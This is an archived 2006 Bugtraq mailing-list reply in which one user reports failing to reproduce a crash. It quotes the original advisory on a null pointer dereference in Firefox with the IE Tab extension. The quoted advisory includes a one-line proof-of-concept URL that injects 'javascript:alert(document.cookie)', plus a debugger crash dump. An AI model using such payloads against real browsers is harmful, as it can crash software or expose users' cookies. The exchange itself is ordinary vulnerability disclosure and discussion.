Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
From: "Roman Daszczyszak" <romandas@xxxxxxxxx>
Date: Fri, 19 May 2006 09:13:27 +0200
Cc: debasis@xxxxxxxxxxxxxxxxxx
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:cc:mime-version:content-type:content-transfer-encoding:content-disposition; b=nLuAlPoisAoqUETA67qoXNGZnMYe2LgHQfljIDnyW6lAqYtmQ0EEF+OavHAvuA6zxwO00REoi2fVbqOh8fVqN6w8v4tXgQHas3uYVt5Qjb48wpphqdJjBo5VmF6Cj9dAs7ugM5EcisejmmFEd5u8umiOvfJ6nskGwvUNywQvKRc=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Using Firefox 1.5.0.3 and IE Tab 1.0.9 on a Windows XP Pro SP2 +
latest patches, I was unable to reproduce this using your PoC
provided.

I created a new tab, pasted the URL you provided into it, hit enter
and received an 'Action Cancelled' page from IE.  Neither Firefox nor
IE crashed.

Was there something more to the bug that I am not seeing?

Regards,
Roman

---------- Forwarded message ----------
From: "Debasis Mohanty" <debasis@xxxxxxxxxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Date: Wed, 17 May 2006 23:48:23 +0530
Subject: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
Firefox (with IETab Plugin) Null Pointer Dereferences Bug
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vendor: Mozilla
Product: FireFox with IE Tab

Tested On:
FireFox Version 1.5.0.3 + IE Tab Version 1.0.9 + Windows (XP / 2K)

Introduction:
IETab (https://addons.mozilla.org/firefox/1419/) is a recently released
(April 12, 2006) plugin for Firefox. It is used to browse IE (only) specific
sites under Firefox. Guess what ?? You can run windowsupdate under FireFox
;-)

Bug Details:
Firefox with the IETab installed crashes when ietab plugin is unable to
handle specific javascripts. It seems to be a null pointer dereference bug.
For more details refer the PoC section.

Proof-of-Concept:
Copy & paste the following URL to the Firefox addressbar and press enter -

chrome://ietab/content/reloaded.html?url=javascript:alert(document.cookie);

Note: This test will not work if IETab is not installed.

The Registers details after the crash:

(1e4.3e0): Access violation - code c0000005 (first chance) First chance
exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00010246

npietab!NP_GetEntryPoints+0xb8ac:

0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????
0:000> g
(1e4.3e0): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=019499b4 edx=00000000 esi=7712174b
edi=00000000
eip=0192e7dc esp=0012eac4 ebp=00000000 iopl=0         nv up ei pl zr na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000246
npietab!NP_GetEntryPoints+0xb8ac:
0192e7dc 668b10           mov     dx,[eax]
ds:0023:00000000=????



For more vulnerabilities : http://hackingspirits.com/vuln-rnd/vuln-rnd.html


Credits:
Debasis Mohanty (aka Tr0y)
www.hackingspirits.com

Prev by Date: RE: [Full-disclosure] RealVNC 4.1.1 Remote Compromise
Next by Date: Secunia Research: CAM UnZip ZIP File Handling Buffer Overflow Vulnerability
Previous by thread: Firefox (with IETab Plugin) Null Pointer Dereferences Bug
Next by thread: DIMVA 2006 - Call For Participation
Index(es):
- Date
- Thread